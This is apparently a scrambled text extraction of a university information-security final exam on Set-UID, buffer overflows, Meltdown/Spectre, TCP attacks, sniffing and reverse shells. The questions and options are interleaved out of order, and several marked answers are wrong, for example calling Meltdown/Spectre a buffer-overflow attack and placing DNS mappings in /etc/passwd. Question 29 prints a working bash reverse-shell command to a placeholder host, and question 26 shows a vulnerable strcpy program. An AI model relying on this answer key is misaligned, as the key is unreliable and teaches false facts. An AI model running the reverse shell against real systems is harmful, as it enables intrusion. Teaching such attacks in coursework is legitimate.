Introduction of Information Security 试: 题/Test Paper
Introduction of Information Security 试: 题/Test Paper
Introduction of Information Security 试: 题/Test Paper
Name
2. In the Linux operating system, a process has access control rights as
Grade &Class 核分人 determined by the process's ( A ).
密 A. Real User ID (RUID) B.Effective User ID (EUID)
Grade &Class C. Reserved user ID D.Root user ID
密
IV. If the paper is not clear please ask the teacher for a new one.
III. Student shall write TSA, ID, Grade & Class in corresponding blank
II. TSA, ID can not be altered
I. Do not answer on the left part of the Sealing Line
2021to 2022Academic Year2ndSemester, Final Exam D. When multiple processes or threads access shared resources at the same
time
Introduction of Information Security 试
4. Meltdown and Spectre attacks are essentially a form of attack
题/Test Paper implemented using ( A ).
A. Buffer overflow vulnerability
()闭卷/开卷
封 B. Race condition vulnerability
( )Open-book or Close Book
C. Set-UID privilege mechanism vulnerability
封
D. Network Protocol stack vulnerability
Q
I II III IV V VI VII VIII IX X 5. Meltdown and Spectre attacks take advantage of the ( A ) characteristics
No.
Q 20 10 30 40 of the CPU when executing program instructions.
Result A. Out Of Order B.Access permission check
Your C.encoding D.decoding
Result
注意:学号、姓名和所在年级班级不写、不写全或写在密封线外者,试卷作废。
6. In the Linux operating system, the correspondence of the DNS
Notice: Student ID, TSA and Grade & Class are not filled properly, the paper is
information is set in the ( C ) file.
invalid.
A. /etc/hosts B./etc/local.d
C./etc/passwd D./etc/shadow
Result I. Single-choice questions (2 points for each question,
Reviewer 20 points in total) 7. In a buffer overflow attack (32-bit operating system), the following ( C )
option does not serve as a valid jump address for the attacker.
1. The Set-UID privilege mechanism allows users to run a piece of a A. 0xbffff250 B.0xbffff280 C.0xbffff300 D.0xbffff310
1
8. The program interface/library corresponding to the following ( A ) option 16. An attacker can successfully implement a TCP SYN flooding attack with
cannot spoof network packets. a fixed source IP address.( × )
A. Socket B.Raw socket C.PCAP library D.All of the above options
17. Buffer overflow vulnerabilities can be avoided by using strncpy(),
9. A 4-byte integer 0xAABBCCDD in a computer is stored at four locations strncat().( √ )
in the memory area addresses of 0x1000,0x1001,0x1002,0x10003 (started
from 0x1000). If the computer has a big endian byte order, the following 18. The Socket type of the network communication program based on TCP
wrong statement is ( D ). protocol is SOCK_STREAM.( √ )
A. The 0xAA is stored in the 0x1000 B.The 0x BB is stored in 0x1001
C.The 0x CC is stored in the 0x1002 D.The 0x DD is stored in 0x1000 19. In the Linux operating system, the privileged shell instruction for the
program TEST is: $sudo chmod 4755 TEST.( √ )
10. For TCP Reset attack, the information NOT required to collect is ( D D
). 20. The monitoring and forgery of data packets in ANY network can be
A. The Source IPAddress/Port B.Target IP address/port realized using network packet sniffing and spoofing techniques.( × )
C. TCP package Sequence number D.Application layer data
Result
Reviewer Result
Reviewer
2. Judgment questions (1 point per question, a total of 10 points. Please mark
√ after the correct description and mark × after the wrong description.) 3. Short answer questions (6 points for each question, 30 points in total)
11. Once the program obtains privileges through the Set-UID mechanism, 21. Please briefly describe the process and principles of DNS deception
the program has super user (root user) privileges.( √ ) attacks in a local network environment (Local DNS attacks).
12. In the Linux operating system, the user's password is stored in the
/etc/passwd file.(√ )
14. When a piece of data is read multiple times from a memory address, the
second read tends to be faster than the first, which is a phenomenon due to
the properties of CPU cache.( × )
2
Student ID
Name
Grade &Class
密
23. Please briefly describe the principle of TCP SYN flooding attack
Note: combined with the information in the figure below.
IV. If the paper is not clear please ask the teacher for a new one.
III. Student shall write TSA, ID, Grade & Class in corresponding blank
II. TSA, ID can not be altered
I. Do not answer on the left part of the Sealing Line
22. Please briefly describe the principle of TCP reset attack combined with
the information in the figure below.
3
Student ID
Name
24. Describe the functions performed by these two statements:
read (5, data, 100);
Grade &Class write(3, data, 100);
密
Note:
IV. If the paper is not clear please ask the teacher for a new one.
III. Student shall write TSA, ID, Grade & Class in corresponding blank
II. TSA, ID can not be altered
I. Do not answer on the left part of the Sealing Line
25. The ALSR (Address Space Layout Randomization) mechanism can make
the buffer overflow attack more difficult to launch, please explain the reason.
4
corresponding area A,B,C,D of the foo() stack frame area in the figure
Student ID Result IV. Analysis questions (10 points for each respectively.
Reviewer question, 40 points in total)
Name
26. Someone has written the C code as below(named: stack.c).
#include <stdlib.h>
Grade &Class #include <stdio.h>
密 #include <string.h>
strcpy(buffer,str);
return 1;
}
badfile = fopen("badfile","r");
fread(str,sizeof(char),200,badfile); (2) Whether the stack.c code has a buffer overflow vulnerability? if so,
foo(str); explain the principle and process of the attack between the main () function
and the foo () function in the memory stack (you can add pictures to clarify
printf("returned Properly\n"); your point), and explain what measures can be taken to prevent this
return 1; vulnerability according to what we have learned during the class.
}
(1) The following figure shows the relative storage location map of the
main () function and the foo() function in the memory stack space. Please
specifically correlate the parameter str of the foo function(represented as
str), the variable buffer[] in foo() (represented as buffer[0] to
buffer[99]),the foo function return address(represented as Return address),
and the pre-frame pointer(represented as previous frame pointer) with the
5
characters being input on the telnet terminal? What impact will the
Student ID
successful attack do to the Server after this attack?
Name
Grade &Class
密
Note:
IV. If the paper is not clear please ask the teacher for a new one.
III. Student shall write TSA, ID, Grade & Class in corresponding blank
II. TSA, ID can not be altered
I. Do not answer on the left part of the Sealing Line
27. As shown in the figure below, the legitimate user User (IP address:
10.0.2.68) is connecting to the server Server (IP address: 10.0.2.69) through
telnet(a tcp-based connection), when the Attacker (IP address: 10.0.2.70)
successfully launched a TCP Session Hijacking attack on this telnet
connection. Then User would find that after 8 characters being input on the
telnet terminal, he cannot enter any information anymore, and the telnet
terminal crashed. The network packet sniffing tool(wireshark, for example)
shows that after the attack is successful launched, any packets User sends to
Server are discarded by Server, and any packets Server sends back to User
are discarded by User as well.
(1) Please analyze and explain the cause of the occurrence of this
phenomenon, that is, the principle of TCP Session Hijacking attack;
(2) Why did the current telnet program freeze and then crash after 8
6
Student ID
Name
Grade &Class
密
Note:
29. With the help of the network, the attacker can obtain the shell or root
IV. If the paper is not clear please ask the teacher for a new one.
III. Student shall write TSA, ID, Grade & Class in corresponding blank
II. TSA, ID can not be altered
I. Do not answer on the left part of the Sealing Line
28. Assuming that machines A and B are in the same local network /bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"
(10.3.2.0/24), A sends out forged packets onto the network and B is
monitoring the packets in the local network. B observes the following (1) Please explain the meaning of 0,1,2,>, <, & represented in the above
information: B can sniff packets with destination IP address 1.2.3.4 from A, statement;
封 but B cannot sniff packets with destination IP address 10.3.2.30 from A. (2) What does the attacker need to do on his machine in order to
Please answer the following questions: successfully get the shell information output on the server side? And please
(1) For B, what are the conditions to successfully sniff the information of explain the meaning represented by /dev/tcp/server_ip/9090;
the local network? (3) Combined with the above statement, explain the implementation
(2) Please explain the cause of the above phenomenon. process of reverse shell attack;
(4) Combined with the relevant knowledge learned in our class, what
attacking methods can be used to successfully transmit and execute the
above reverse shell instruction on the server side?
7
8